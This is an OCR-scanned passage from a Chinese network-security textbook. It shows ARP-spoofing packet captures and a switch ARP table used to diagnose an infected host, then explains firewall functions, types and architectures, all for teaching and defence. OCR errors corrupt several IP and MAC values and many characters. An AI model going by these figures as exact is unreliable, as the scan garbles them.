|s Ethernet II, src: Giga-Byt_04:1b:a9 (00:0f:ea:04:1b:a9), Dst: Aopen.57:3f:5c (00:01:80:57 
| Address resolution Protocol (reply) 
Hardware type: Ethernet (0x0001) 
Protocol type: IP (0x0800) 
Hardware size: 6 
Protocol size: 4 
Opcode: reply (0x0002) 
Sender MAC address: Glga-Byt 04:1b:39 (00:0f:ea:04:1b:49) 
Sender IP address: 172.16.206.6 (172.16.226.6) 
Target MAC address: Aopen 37:3f:5c (00:01:80:57:3f:5c) 
Target IP address: 172.16.206.46 (172.16.206.46) 


Aop 


57:3f:5€ 


Broadcast 


图 1.5 针对 PC 的 ARP 欺骗 回应 报 文 


2398 17.111545  Aopen_57:3f:5c 


2403 17.361638 aopen c 


[s Frame 2402 (42 bytes on n 42 bytes captur 
|s Ethernet II, src: Aopen 57:3f:5c (00:01:80:57:3f::c), Dst: Giga-Byt O4:1b:a9 (00:0f:ez:04 
|» Address resolution Protocol (reply) 
Hardware type: Ethernet Coxo001) 
Protocol type: IP (0x0800) 
Hardware size: 6 
Protocol size: 4 
opcode: reply (0x0002) 
Sender MAC address: Aopen.57:3f:5c (00:01:80:57:3f:5c) 


Broadcast. ARP — who has 172.16.206.255? Tell 172.16.206.46 


Target MAC address: Giga-Byt Oaplb:a9 CO 
Target IP address: 172.16.206.6 (172.16.206.6) 


图 1.6 针对 PC 的 ARP 欺骗 攻击 报 文 


攻击 主机 发 送 ARP Reply 报 文 给 被 攻击 主机 ,会 更 改 172. 16. 206. 6 主机 上 关于 网 关 
172. 16.206. 1 的 MAC 地 址 为 病毒 主机 的 MAC 地 址 : 00-01-80-57-3F-5C, 使 得 被 攻击 主 
机 的 报 文 无 法 被 交换 机 接收 并 转发 。 


1.5.3 针对 网 关 的 ARP 欺骗 行为 


1. 针对 网 关 的 ARP 欺骗 行为 

针对 网 关 的 ARP 欺骗 行为 是 指 攻击 主机 通过 ARP 报 文 更 改 网 关 设备 (交换 机 、 路 由 
器 防火 墙 等 网 络 设 备 ) 上 关于 其 他 主机 正确 的 ARP 表 项 。 导 致 交换 机 在 转发 报 文 时 ,将 
报 文 转发 给 错误 的 MAC 地 址 ,导致 从 网 络 到 主机 的 报 文 不 能 被 正确 转发 给 主机 ,导致 网 络 
中 断 的 现象 。 

2. 实例 分 析 

网 络 内 多 个 主机 无 法 上 网 ,主机 上 关于 网 关 的 ARP. 表 项 正确 ,而 网 络 交 换 机 上 关于 这 
些 主机 的 ARP 表现 不 正确 ,导致 报 文 不 能 正确 地 被 转发 。 


office show arp 


Total arp items is 221. the matched arp items is 221 


Address Hardware Addr Interface Port Flag 

172.16. 1.41 00-D0-95-C9-A1-5A Ethernet0/1/1 Ethernet0/1/1 Dynamic 
192.168.160.14 00-0B-CD-6A-D4-D2  Vlanl Ethernet0/0/1 | Dynamic 
192. 168. 162.2 . 00-12-3F-67-14-2C Vlan3 Ethernet0/0/3 Dynamic 
192. 168. 162.3 00-11-5B-0B-59-74 Vlan3 Ethernet0/0/3 Dynamic 


192. 168. 162.6 00-0C-F1-D1-E7-E5 Vlan3 Ethernet0/0/3 Dynamic 


92.168.162.8 00-20-ED-A8-65-CB  Vlan3 Ethernet0/0/3 Dynamic 
92. 168. 162.9  00-0D-60-CA-DC-CO  Vlan3 Ethernet0/0/3 Dynamic 
192. 168. 162.20 00-10-5C-ED-30-99 Vlan3 Ethernet0/0/3 Dynamic 
192. 168. 162.23 00-10-5C-F1-C2-F3 Vlan3 Ethernet0/0/3 Dynamic 
92. 168. 162.24 00-10-5C-F1-A7-C7 Vlan3 Ethernet0/0/3 Dynamic 
92. 168. 162. 100 00-07-95-F3-39-7F Vlan3 Ethernet0/0/3 Dynamic 
92. 168. 162. 253 00-30-48-2 A-C5-51 Vlan3 Ethernet0/0/3 Dynamic 
192. 168. 163.3 00-11-D8-04-8A-6D Vlan4 Ethernet0/0/4 Dynamic 
192. 168. 163.4 . 00-30-FI-BF-7F-34 Vlan4 Ethernet0/0/4 Dynamic 
92. 168. 163.6 00-40-05-47-19-4E Vlan4 Ethernet0/0/4 Dynamic 
92. 168. 163.8 00-05-5D-02-DD-1D Vlan4 Ethernet0/0/4 Dynamic 
92. 168. 163.9 . 00-E0-4C-11-02-23 Vlan4 Ethernet0/0/4 Dynamic 
92. 168. 163.10 00-E0-4C-41-04-DB Vlan4 Ethernet0/0/4 Dynamic 
92.168.163. 11 00-E0-4C-00-27-DF Vlan4 Ethernet0/0/4 Dynamic 
92. 168. 163.12 00-E0-4C-41-04-DB . Vlan4 Ethernet0/0/4 Dynamic 
192.168.163.15 00-E0-4C-41-04-DB  Vlan4 Ethernet0/0/4 Dynamic 
192.168.163.16  00-E0-4C-82-09-27 Vlan4 Ethernet0/0/4 Dynamic 
92.168.163.45  00-40-05-47-36-0C Vlan4 Ethernet0/0/4 Dynamic 
192.168.163.47 00-40-05-47-36-0C Vlan4 Ethernet0/0/4 Dynamic 
192.168.163.48  00-40-05-47-36-0C Vlan4 Ethernet0/0/4 Dynamic 


可 以 看 到 ,同一 个 MAC 地 址 对 应 多 个 全, 说 明 交 换 机 已 经 被 ARP 病毒 攻击 了 ,可 以 在 
对 应 的 Ethernet0/0/4 接口 去 查找 病毒 主机 ,并 进行 设置 。 
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第 2 章 防火 墙 技术 


随 着 科学 技术 的 快速 发 展 ,网 络 技术 的 不 断 发 展 和 完善 ,在 当今 信息 化 社会 中 ,人 们 生 
活 和 工作 中 的 许多 数据 、 资 源 与 信息 都 通过 计算 机 系统 来 存储 和 处 理 , 伴 随 着 网 络 应 用 的 发 
展 ,这 些 信 息 都 通过 网 络 来 传送 ,接收 和 处 理 ,所 以 计算 机 网 络 在 社会 生活 中 的 作用 越 来 越 
大 。 为 了 维护 计算 机 网 络 的 安全 ,人 们 提出 了 许多 手段 和 方法 ,采用 防火 墙 是 其 中 最 主要 、 
最 核心 .最 有 效 的 手段 之 一 。 防 火 墙 是 网 络 安全 政策 的 有 机 组 成 部 分 , 它 通 过 控制 和 监测 网 
络 之 间 的 信息 交换 和 访问 行为 来 实施 对 网 络 安全 的 有 效 管理 ,防火 墙 常常 被 安装 在 受 保护 
的 内 部 网 络 连接 到 Internet 的 节点 上 , 它 对 传输 的 数据 包 和 连接 方式 按照 一 定 的 安全 策略 
对 其 进行 检查 ,来 决定 网 络 之 间 的 通信 是 否 被 允许 。 防 火 墙 能 有 效 地 控制 内 部 网 络 与 外 部 
网 络 之 间 的 访问 及 数据 传输 ,从 而 达到 保护 内 部 网 络 的 信息 不 受 外 部 非 授 权 用 户 的 访问 和 
对 不 良 信息 的 过 滤 。 


2.1 防火 墙 概述 


古代 构筑 和 使 用 木 制 结构 房屋 的 时 候 为 防止 火灾 的 发 生 和 草 延 ,人 们 将 坚固 的 石 块 堆 
砌 在 房屋 周转 作为 屏障 ,这 种 防护 构筑 物 就 被 称 为 "防火 墙 (Fire Wall) 。 随 着 计算 机 和 网 
络 的 发 展 ,各 种 攻击 入 侵 手段 也 相继 出 现 了 ,为 了 保护 计算 机 的 安全 ,人 们 开发 出 一 种 能 阻 
小 计算 机 之 间 直接 通信 的 技术 ,并 沿用 了 古代 类 似 这 个 功能 的 名 字 一 -防火墙 。 在 网 络 安 
全 专业 方面 ,防火 墙 是 一 种 位 于 两 个 或 多 个 网 络 之 间 , 实 施 网 络 之 间 访 问 控制 的 组 件 集合 。 
对 于 普通 用 户 来 说 ,所 谓 防 火 墙 ,是 指 一 种 被 放置 在 自己 的 计算 机 与 外 界 网 络 之 间 的 防御 系 
统 ,从 网 络 发 往 计算 机 的 所 有 数据 都 要 经 过 它 的 判断 
处 理 后 , 才 会 决定 能 不 能 把 这 些 数据 交 给 计算 机 ,一 Cena 3 A c 
量 发 现 有 害 数据 ,防火 墙 就 会 拦截 下 来 ,实现 了 对 计 a 
算 机 的 保护 。 防 火 墙 在 网 络 中 的 位 置 如 图 2.1 所 示 。 图 2.1 防火 墙 在 网 络 中 的 位 置 


2.2 防火 墙 的 功能 


防火 墙 要 求 所 有 进出 网 络 的 通信 流 都 应 该 通过 防火 墙 ,所 有 穿 过 防火 墙 的 通信 流 都 必 
须 有 安全 策略 和 计划 确认 并 授权 。 防 火 墙 按照 规定 好 的 配置 和 规则 ,监测 并 过 滤 所 有 通 向 
外 部 网 络 和 从 外 部 网 络 传 来 的 信息 ,只 允许 授权 的 数据 通过 ,防火 墙 还 应 该 能 够 记录 有 关 的 
连接 来 源 、 服 务 器 提供 的 通信 和 量 ,以 及 试图 问 入 者 的 任何 企图 ,以 方便 管理 员 的 监测 和 跟踪 。 
一 般 来 说 ,防火 墙 具有 以 下 几 种 功能 。 


1. 防止 易 受 攻击 的 服务 

防火 墙 可 以 过 滤 不 安全 的 服务 来 降低 子 网 上 主 系统 所 冒 的 风险 。 如 禁止 某 些 易 受 攻击 
的 服务 (如 NFS) 进 入 或 离开 受 保护 的 子 网 。 防 火 墙 还 可 以 防护 基于 路 由 选择 的 攻击 ,如 源 
路 由 选择 和 企图 通过 ICMP 改 向 把 发 送 路 径 转向 遭 致 损害 的 网 点 。 

2. 控制 访问 网 点 系统 

防火 墙 还 有 能 力 控 制 对 网 点 系统 的 访问 。 例 如 ,除了 邮件 服务 器 或 信息 服务 器 等 特殊 
情况 外 ,网 点 可 以 防止 外 部 对 其 主 系统 的 访问 。 

3. 集中 安全 性 

防火 墙 闭合 的 安全 边界 保证 可 信和 网 络 和 不 可 信和 网 络 之 间 的 流量 只 有 通过 防火 墙 才 有 可 
能 实现 ,因此 ,可 以 在 防火 墙 设置 统一 的 策略 管理 ,而 不 是 分 散 到 每 个 主机 中 。 

4. 增强 保密 、 强 化 私有 权 

使 用 防火 墙 系统 ,站 点 可 以 防止 finger 以 及 DNS 域名 服务 。finger 会 列 出 当前 使 用 者 
名 单 和 上 次 登录 的 时 间 , 以 及 是 否 读 过 邮件 等 。 防 火 墙 也 能 封锁 域名 服务 信息 ,从 而 使 
Internet 外 部 主机 无 法 获取 站 点 名 和 IP 地 址 。 

5. 有 关 网 络 使 用 、 滥 用 记录 和 统计 

如 果 对 Internet 的 往返 访问 都 通过 防火 墙 ,那么 ,防火 墙 可 以 记录 各 次 访问 ,并 提供 有 
关 网 络 使 用 率 有 价值 的 统计 数字 。 如 果 一 个 防火 墙 能 在 可 疑 活 动 发 生 时 发 出 音响 报警 , 则 
还 提供 防火 墙 和 网 络 是 否 受 到 试探 或 攻击 的 细节 。 采 集 网 络 使 用 率 统计 数字 和 试探 的 证 据 
是 很 重要 的 ,这 有 很 多 原因 。 最 为 重要 的 是 可 知道 防火 墙 能 否 抵御 试探 和 攻击 ,并 确定 防火 
墙 上 的 控制 措施 是 否 得 当 。 网 络 使 用 率 统计 数字 也 很 重要 的 ,因为 它 可 作为 网 络 需 求 研究 
和 风险 分 析 活 动 的 输入 。 

6. 政策 执行 

防火 墙 可 提供 实施 和 执行 网 络 访问 政策 的 工具 。 事 实 上 ,防火 墙 可 向 用 户 和 服务 提供 访问 
控制 。 因 此 ,网 络 访问 政策 可 以 由 防火 墙 执行 ,如 果 没有 防火 墙 ,这 样 一 种 政策 完全 取决 于 用 户 
的 协作 。 网 点 也 许 能 依赖 自己 的 用 户 进行 协作 ,但 是 ,一 般 不 可 能 ,也 不 依赖 Internet 用 户 。 

防火 墙 的 作用 是 防止 非法 通信 和 未 经 过 授权 的 通信 进出 被 保护 的 网 络 。 防 火 墙 的 任务 
就 是 从 各 种 端口 中 辨别 判断 从 外 部 不 安全 网 络 发 送 到 内 部 安全 网 络 中 具体 的 计算 机 的 数据 
是 否 有 害 , 并 尽 可 能 将 有 害 数据 丢弃 ,从 而 达到 初步 的 网 络 系统 安全 保障 。 它 还 要 在 计算 机 
网 络 和 计算 机 系统 受到 危害 之 前 进行 报警 .拦截 和 响应 。 

一 般 通 过 对 内 部 网 络 安装 防火 墙 和 正确 配置 后 都 可 以 达到 以 下 目的 。 

CD. 限制 未 授权 的 用 户 进 入 内 部 网 络 ,过 滤 掉 不 安全 服务 和 非法 用 户 。 

(2) 防止 人 侵 者 接近 内 部 网 络 防 御 设 施 。 

(3) 限定 内 部 用 户 访问 特殊 站 点 。 

(4) 为 监视 Internet 安全 提供 方便 。 


2.3 防火 墙 的 分 类 


防火 墙 可 以 用 来 控制 Internet 和 Intranet 之 间 所 有 的 数据 流量 。 在 具体 应 用 中 ,防火 
墙 是 位 于 被 保护 网 络 和 外 部 网 络 之 间 的 一 组 路 由 器 ,以 及 配 有 适当 软件 的 计算 机 网 络 的 多 


网 络 安 全 与 信息 保障 


种 组 合 。 防 火 墙 为 网 络 安全 起 到 了 把 关 作 用 ,只 允许 授权 的 通信 通过 。 防 火 墙 是 两 个 网 络 
之 间 的 成 分 集合 ,有 以 下 性 质 。 

CD. 内 部 网 络 和 外 部 网 络 之 间 的 所 有 网 络 数据 流 都 必须 经 过 防火 墙 。 

(2) 只 有 符合 安全 策略 的 数据 流 才 能 通过 防火 墙 。 

(3) 防火 墙 自 身 应 具有 非常 强 的 抗 攻 击 免疫 力 。 一 个 好 的 防火 墙 应 具有 以 下 属性 : 

* 所 有 的 信息 都 必须 通过 防火 墙 ; 

。 只 有 在 受 保护 网 络 的 安全 策略 中 允许 的 通信 才 人 允许 通过 防火 墙 ; 

。 记录 通过 防火 墙 的 信息 内 容 和 活动 ; 

。 对 网 络 攻击 的 检测 和 告警 ; 

* 防火 墙 本 身 对 各 种 攻击 免疫 。 

根据 物理 特性 ,防火 墙 分 为 两 大 类 : 硬件 防火 墙 和 软件 防火 墙 。 软 件 防火 墙 是 一 种 安 
装 在 负责 内 外 网 络 转换 的 网 关 服务 器 或 独立 的 个 人 计算 机 上 的 特殊 程序 , 它 是 以 逻辑 形式 
存在 的 ,防火 墙 程序 跟随 系统 启动 ,通过 运行 在 Ring0 级 别 的 特殊 驱动 模块 把 防御 机 制 插入 
系统 关于 网 络 的 处 理 部 分 和 网 络 接 口 设备 驱动 之 间 , 形 成 一 种 馆 辑 上 的 防御 体系 。 

在 没有 软件 防火 墙 之 前 ,系统 和 网 络 接口 设备 之 间 的 通道 是 直接 的 ,网 络 接口 设备 通过 
网 络 驱动 程序 接口 (Network Driver Interface Specification,NDIS) 把 网 络 上 传 来 的 各 种 报 
文 都 忠实 的 交 给 系统 处 理 。 例 如 ,一 台 计 算 机 接收 到 请 求 列 出 计算 机 上 所 有 共享 资源 的 数 
据 报 文 ,NDIS 直接 把 这 个 报 文 提交 给 系统 ,系统 在 处 理 后 就 会 返回 相应 数据 ,在 某 些 情况 
下 就 会 造成 信息 泄漏 。 而 使 用 软件 防火 墙 后 ,尽管 NDIS 接收 到 仍然 是 原封 不 动 的 数据 报 
文 , 但 是 在 提交 到 系统 的 通道 上 多 了 一 层 防御 机 制 ,所 有 数据 报 文 都 要 经 过 这 层 机 制 根据 一 
定 的 规则 判断 处 理 , 只 有 它 认 为 安全 的 数据 才能 到 达 系统 ,其 他 数据 则 被 丢弃 。 因 为 有 规则 
提 到 * 列 出 共享 资源 的 行为 是 危险 的 ,因此 在 防火 墙 的 判断 下 ,这 个 报 文 会 被 丢弃 ,这 样 一 
来 ,系统 接收 不 到 报 文 , 则 认为 什么 事情 也 没 发 生 过 ,也 就 不 会 把 信息 泄漏 出 去 了 。 

软件 防火 墙 工作 于 系统 接口 与 NDIS 之 间 , 用 于 检查 过 滤 由 NDIS 发 送 过 来 的 数据 ,在 
无 须 改 动 硬件 的 前 提 下 便 能 实现 一 定 强度 的 安全 保障 ,但 是 由 于 软件 防火 墙 自身 属于 运行 
于 系统 上 的 程序 ,不 可 避免 地 需要 占用 一 部 分 CPU 资源 维持 工作 ,而 且 由 于 数据 判断 处 理 
需要 一 定 的 时 间 ,在 一 些 数据 流量 大 的 网 络 中 ,软件 防火 墙 会 使 整个 系统 工作 效率 和 数据 知 
吐 速度 下 降 , 甚 至 有 些 软件 防火 墙 会 存在 漏洞 ,导致 有 害 数据 可 以 绕 过 它 的 防御 体系 ,给 数 
据 安 全 带 来 损失 ,因此 ,许多 企业 并 不 会 考虑 用 软件 防火 墙 方案 作为 公司 网 络 的 防御 措施 ， 
而 是 使 用 看 得 见 摸 得 着 的 硬件 防火 墙 。 

硬件 防火 墙 是 一 种 以 物理 形式 存在 的 专用 设备 ,通常 架设 于 两 个 网 络 的 驳 接 处 ,直接 从 
网 络 设备 上 检查 过 滤 有 害 的 数据 报 文 , 位 于 防火 墙 设备 后 端的 网 络 或 服务 器 接收 到 的 是 经 
过 防火 墙 处 理 的 相对 安全 的 数据 ,不 必 另 外 分 出 CPU 资源 去 进行 基于 软件 架构 的 NDIS 数 
据 检 测 ,可 以 大 大 提高 工作 效率 。 

硬件 防火 墙 一 般 是 通过 网 线 连 接 于 外 部 网 络 接口 与 内 部 服务 器 或 企业 网 络 之 间 的 设 
备 , 又 可 另外 分 出 两 种 结构 ,一 种 是 普通 硬件 级 别 防火 墙 , 它 拥有 标准 计算 机 的 硬件 平台 
一 些 功能 经 过 简化 处 理 的 UNIX 操作 系统 和 防火 墙 软件 ,这 种 防火 墙 措施 相当 于 专门 拿 出 
一 台 计 算 机 安装 了 软件 防火 墙 ,除了 不 需要 处 理 其 他 事务 以 外 , 它 毕 竞 还 是 一 般 的 操作 系 
统 ,因此 有 可 能 会 存在 漏洞 和 不 稳定 因素 ,安全 性 并 不 能 做 到 最 好 ; 另 一 种 是 “芯片 ”级 硬 


件 防 火 墙 , 它 采 用 专门 设计 的 硬件 平台 ,在 上 面 搭建 的 软件 也 是 专门 开发 的 ,并 非 流行 的 操 
作 系统 ,因而 可 以 达到 较 好 的 安全 性 能 保障 。 但 无 论 是 哪 种 硬件 防火 墙 ,管理 员 都 可 以 通过 
计算 机 连接 上 去 设置 工作 参数 。 由 于 硬件 防火 墙 的 主要 作用 是 把 传人 的 数据 报 文 进行 过 滤 
处 理 后 转发 到 位 于 防火 墙 后 面 的 网 络 中 ,因此 它 自身 的 硬件 规格 也 是 分 档次 的 ,尽管 硬件 防 
火 墙 已 经 足以 实现 比较 高 的 信息 处 理 效 率 ,但 是 在 一 些 对 数据 吞吐 量 要 求 很 高 的 网 络 中 , 档 
次 低 的 防火 墙 仍 然 会 形成 瓶颈 ,所 以 对 于 一 些 大 企业 而 言 ,芯片 级 的 硬件 防火 墙 才 是 首选 。 

从 技术 上 进行 分 类 ,防火墙 可 分 为 以 下 5 类 技术 。 

1. 屏蔽 路 由 技术 

最 简单 和 最 流行 的 防火 墙 形式 是 “屏蔽 路 由 器 "”。 屏 项 路 由 器 在 网 络 层 工作 (有 的 还 包 
括 传输 层 ) ,采用 包 过 滤 或 虚 电 路 技术 , 包 过 滤 通 过 检查 每 个 IP 网 络 包 ,取得 其 头 信息 ,一 般 
包括 到 达 的 物理 网 络 接口 , 源 IP 地 址 .目标 IP 地 址 、 传 输 层 类 型 (TCP .UDP ,ICMP) Vif jig 
口 和 目的 端口 。 根 据 这 些 信 息 ,判别 是 否 规则 集中 的 某 条 目 匹 配 ,并 对 匹配 包 执行 规则 中 指 
定 的 动作 (禁止 或 允许 ) 。 

2. 基于 代理 的 (也 称 应 用 网 关 ) 防 火 墙 技术 

它 通常 被 配置 为 “ 双 宿 主 网 关 ”, 具 有 两 个 网 络 接口 卡 , 同 时 接 入 内 部 网 络 和 外 部 网 络 。 
由 于 网 关 可 以 与 两 个 网 络 通信 , 它 是 安装 传递 数据 软件 的 理想 位 置 。 这 种 软件 就 称 为 “ 代 
理 ”, 通 常 是 为 其 所 提供 的 服务 定制 的 。 代 理 服 务 不 允许 直接 与 真正 的 服务 通信 ,而 是 与 代 
理 服 务 器 通信 (用 户 的 默认 网 关 指 向 代理 服务 器 ) 。 各 个 应 用 代理 在 用 户 和 服务 之 间 处 理 所 
有 的 通信 。 能 够 对 通过 它 的 数据 进行 详细 的 审计 追踪 ,许多 专家 也 认为 它 更 加 安全 ,因为 代 
理 软件 可 以 根据 防火 墙 后 面 的 主机 的 脆弱 性 来 制定 ,以 专门 防范 已 知 的 攻击 。 

3. 包 过 滤 技 术 

系统 按照 一 定 的 信息 过 滤 规 则 ,对 进出 内 部 网 络 的 信息 进行 限制 ,允许 授权 信息 通过 ， 
而 拒绝 非 授权 信息 通过 。 包 过 滤 防 火 墙 工作 在 网 络 层 和 数据 链 路 层 之 间 。 截 获 所 有 流 经 的 
IP 包 ,从 其 IP 头 、 传 输 层 协议 头 , 甚 至 应 用 层 协 议 数据 中 获取 过 滤 所 需 的 相关 信息 。 然 后 
依次 按 顺序 与 事先 设 定 的 访问 控制 规则 进行 一 一 匹配 比较 ,执行 其 相关 的 动作 。 

4. 动态 防火 墙 技术 

动态 防火 墙 技术 是 针对 静态 包 过 滤 技 术 而 提出 的 一 项 新 技术 。 静 态 包 过 滤 技 术 局 限于 
过 滤 基 于 源 及 目的 的 端口 .IP 地 址 的 输入 输出 业务 ,因而 限制 了 控制 能 力 , 并 且 由 于 网 络 的 
所 有 高 位 (1024 一 65 535) 端 要 么 开放 ,要 么 关闭 ,使 网 络 处 于 很 不 完全 的 境地 。 而 动态 防火 
墙 技术 可 创建 动态 的 规则 ,使 其 适应 不 断 改变 的 网 络 业 务 量 。 根 据 用 户 的 不 同 要 求 ,规则 能 
被 修改 并 接受 或 拒绝 条 件 。 动 态 防 火 墙 为 了 跟踪 维护 连接 状态 , 它 必须 对 所 有 进出 的 数据 
包 进 行 分 析 , 从 其 传输 层 、 应 用 层 中 提取 相关 的 通信 和 应 用 状态 信息 ,根据 其 源 和 目的 IP 地 
址 ,传输 层 协 议和 源 及 目的 端口 来 区 分 每 一 连接 ,并 建立 动态 连接 表 为 所 有 连接 存储 其 状态 
和 上 下 文 信息 ; 同时 为 检查 后 续 通信 。 应 及 时 更 新 这 些 信息 , 当 连 接 结束 时 ,也 应 及 时 从 连 
接 表 中 删除 其 相应 信息 。 

5. 复合 型 防火 墙 技 术 

由 于 过 滤 型 防火 墙 安全 性 不 高 ,代理 服务 器 型 防火 墙 速度 较 慢 ,因而 出 现 了 一 种 综合 上 
述 两 种 技术 优点 的 改进 型 防火 墙 技术 , 它 保证 了 一 定 的 安全 性 ,又 使 通过 它 的 信息 传输 速度 
不 至 于 受到 太 大 的 影响 。 对 于 那些 从 内 部 网 络 向 外 部 网 络 发 出 的 请 求 ,由 于 对 内 部 网 络 的 
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安全 威胁 不 大 ,因此 可 直接 下 载 外 部 网 络 建立 连接 ,对 于 那些 从 外 部 网 络 向 内 部 网 络 提出 的 
请 求 , 先 要 通过 包 过 滤 型 防火 墙 ,在 此 经 过 初步 安全 检查 ,两 次 检查 确定 无 疑 后 可 接受 其 请 
求 , 否 则 ,就 需要 丢弃 或 做 其 他 处 理 。 


2.4 防火 墙 的 体系 结构 


目前 ,防火 墙 的 体系 结构 一 般 有 双重 宿主 主机 体系 结构 .屏蔽 主机 体系 结构 .屏蔽 子 网 
体系 结构 3 种 。 

1. 双重 宿主 主机 体系 结构 

双重 宿主 主机 体系 结构 是 围绕 具有 双重 宿主 的 主机 计算 机 而 构筑 的 ,该 计算 机 至 少 有 
两 个 网 络 接口 。 这 样 的 主机 可 以 充当 与 这 些 接口 相连 的 网 络 之 间 的 路 由 器 ; 它 能 够 从 一 个 
网 络 到 另 一 个 网 络 发 送 IP 数据 包 。 然 而 ,实现 双重 宿主 主机 的 防火 墙 体系 结构 禁止 这 种 发 
送 功能 。 因 而 ,IP 数据 包 从 一 个 网 络 ( 如 外 部 网 ) 并 不 是 直接 发 送 到 其 他 网 络 (如 内 部 的 被 
保护 的 网 络 )。 防 火 墙 内 部 的 系统 能 与 双重 宿主 主机 通信 ,同时 防火 墙 外 部 的 系统 能 与 双重 
宿主 主机 通信 ,但 是 这 些 系统 不 能 直接 互相 


通信 。 它 们 之 间 的 IP 通信 被 完全 阻止 。 [x 
双重 宿主 主机 的 防火 墙 体系 结构 是 相当 = 3m 


简单 的 ,双重 宿主 主机 位 于 两 者 之 间 ,并 且 被 
连接 到 外 部 网 络 和 内 部 网 络 , 如 图 2. 2 所 示 。 图 2.2 双重 宿主 主机 体系 结构 
2. 屏蔽 主机 体系 结构 
双重 宿主 主机 体系 结构 提供 来 自 于 多 个 网 络 相连 的 主机 服务 (但 是 路 由 关闭 ) ,而 屏蔽 
主机 体系 结构 使 用 一 个 单独 的 路 由 器 提供 来 自 仅仅 与 内 部 网 络 相连 的 主机 服务 。 在 屏蔽 主 
机 体系 结构 中 ,主要 的 安全 由 数据 包 过 滤 提 供 ( 如 数据 包 过 滤 用 于 防止 人 们 绕 过 代理 服务 器 
直接 相连 ) ,如 图 2. 3 所 示 。 
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图 2.3 屏蔽 主机 体系 结构 


在 屏蔽 路 由 器 上 的 数据 包 过 滤 是 按 堡 又 主机 是 Internet. 上 的 主机 能 连接 到 内 部 网 络 上 
的 系统 的 桥梁 (如 传送 进来 的 电子 邮件 )。 即 使 这 样 , 也 仅 有 某 些 确定 类 型 的 连接 被 允许 。 
任何 外 部 的 系统 试图 访问 内 部 的 系统 或 服务 将 必须 连接 到 这 人 台 堡 垒 主机 上 。 因 此 ,堡垒 主 
机 需要 拥有 高 等 级 的 安全 。 

数据 包 过 滤 也 允许 堡垒 主机 开放 可 人 允许 的 连接 (什么 是 “可 人 允许 ?将 由 用 户 的 站 点 的 安 
全 策略 决定 ) 到 外 部 网 络 。 

在 屏蔽 的 路 由 器 中 数据 包 过 滤 配 置 可 以 按 下 列 之 一 执行 。 

D 允许 其 他 的 内 部 主机 为 了 某 些 服务 与 Internet 上 的 主机 连接 ( 即 允 许 那 些 已 经 由 
数据 包 过 滤 的 服务 ) 。 

(2) 不 允许 来 自 内 部 主机 的 所 有 连接 (强迫 那些 主机 经 由 堡垒 主机 使 用 代理 服务 ) 。 

用 户 可 以 针对 不 同 的 服务 混合 使 用 这 些 手段 ; 某 些 服务 可 以 被 允许 直接 经 由 数据 包 过 
滤 , 而 其 他 服务 可 以 被 允许 仅仅 间接 地 经 过 代理 。 这 完全 取决 于 用 户 实行 的 安全 策略 。 

因为 这 种 体系 结构 允许 数据 包 从 Internet 向 内 部 网 络 的 移动 ,所 以 , 它 的 设计 比 没有 外 
部 数据 包 能 到 达 内 部 网 络 的 双重 宿主 主机 体系 结构 似乎 是 更 冒 风 险 。 话 说 回来 ,实际 上 双 
重 宿主 主机 体系 结构 在 防备 数据 包 从 外 部 网 络 穿 过 内 部 的 网 络 也 容易 产生 失败 (因为 这 种 
失败 类 型 是 完全 出 乎 预料 的 ,不 大 可 能 防备 黑客 侵袭 )。 总 而 言 之 ,保卫 路 由 器 比 保卫 主机 
较 易 实现 ,因为 它 提供 非常 有 限 的 服务 组 。 多 数 情况 下 ,屏蔽 主机 体系 结构 提供 比 双重 宿主 
主机 体系 结构 具有 更 好 的 安全 性 和 可 用 性 。 

3. 屏蔽 子 网 体系 结构 

屏蔽 子 网 体系 结构 通过 添加 额外 的 安全 层 到 被 屏蔽 主机 体系 结构 , 即 通过 添加 周边 网 
络 更 进一步 地 把 内 部 网 络 与 Internet 隔离 开 。 在 这 种 体系 结构 下 ,即使 攻破 了 堡垒 主机 ,也 
不 能 直接 侵入 内 部 网 络 (因为 它 将 仍然 必须 通过 内 部 路 由 器 ) ,如 图 2.4 所 示 。 


堡垒 主机 
屏蔽 内 部 内 部 
路 由 器 [— 路 由 器 网 络 
Web 服 务 器 


图 2.4 屏蔽 子 网 体系 结构 


堡垒 主机 是 用 户 的 网 络 上 最 容易 受 侵袭 的 机 器 。 任 赁 用 户 尽 最 大 的 能 力 去 保护 它 , 它 
仍 是 最 有 可 能 被 侵袭 的 机 器 ,因为 它 本 质 上 是 能 够 被 侵袭 的 机 器 。 如 果 在 屏蔽 主机 体系 结 
构 中 ,用 户 的 内 部 网 络 对 来 自用 户 的 堡垒 主机 的 侵袭 门户 洞开 ,那么 用 户 的 堡垒 主机 是 非常 
诱 人 的 攻击 目标 。 在 它 与 用 户 的 其 他 内 部 机 器 之 间 没 有 其 他 的 防御 手段 时 (除了 它们 可 能 
有 的 主机 安全 之 外 ,这 通常 是 非常 少 的 ) 。 如 果 有 人 成 功 地 侵入 屏蔽 主机 体系 结构 中 的 堡 从 
主机 , 那 就 毫 无 阻挡 地 进入 了 内 部 网 络 系统 。 

通过 在 周边 网 络 上 隔离 堡垒 主机 ,能 减少 在 堡垒 主机 上 入 侵 的 影响 。 可 以 说 , 它 只 给 入 
侵 者 一 些 访问 的 机 会 ,但 不 是 全 部 。 屏 项 子 网 体系 结构 的 最 简单 的 形式 为 两 个 屏蔽 路 由 器 ， 
每 一 个 都 连接 到 周边 网 络 ,一 个 位 于 周边 网 络 与 内 部 网 络 之 间 , 另 一 个 位 于 周边 网 络 与 外 部 
网 络 之 间 ( 通 常 为 Internet)。 为 了 入 侵 这 种 类 型 的 体系 结构 构筑 的 内 部 网 络 , 侵 袭 者 必须 
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要 通过 两 个 路 由 器 。 即 使 侵袭 者 设法 侵入 堡垒 主机 ,他 将 仍然 必须 通过 内 部 路 由 器 。 在 此 
情况 下 ,没有 损害 内 部 网 络 的 单一 的 易 受 侵袭 点 。 作 为 人 侵 者 ,只 是 进行 了 一 次 访问 。 

(1) 周边 网 络 

周边 网 络 是 另 一 个 安全 层 ,是 在 外 部 网 络 与 被 保护 的 内 部 网 络 之 间 的 附加 的 网 络 。 如 
果 侵 袭 者 成 功 地 侵入 用 户 的 防火 墙 的 外 层 领域 ,周边 网 络 在 那个 侵袭 者 与 用 户 的 内 部 系统 
之 间 提 供 一 个 附加 的 保护 层 。 

在 许多 网 络 结构 中 ,用 给 定 网 络 上 的 任何 机 器 来 查看 这 个 网 络 上 的 每 一 台 机 器 的 通信 
都 是 可 能 的 ,如 以 太 网 、 令 牌 环 和 FDDI。 探 听 者 可 以 监听 Telnet, FTP 及 rlogin 会 话 期 间 
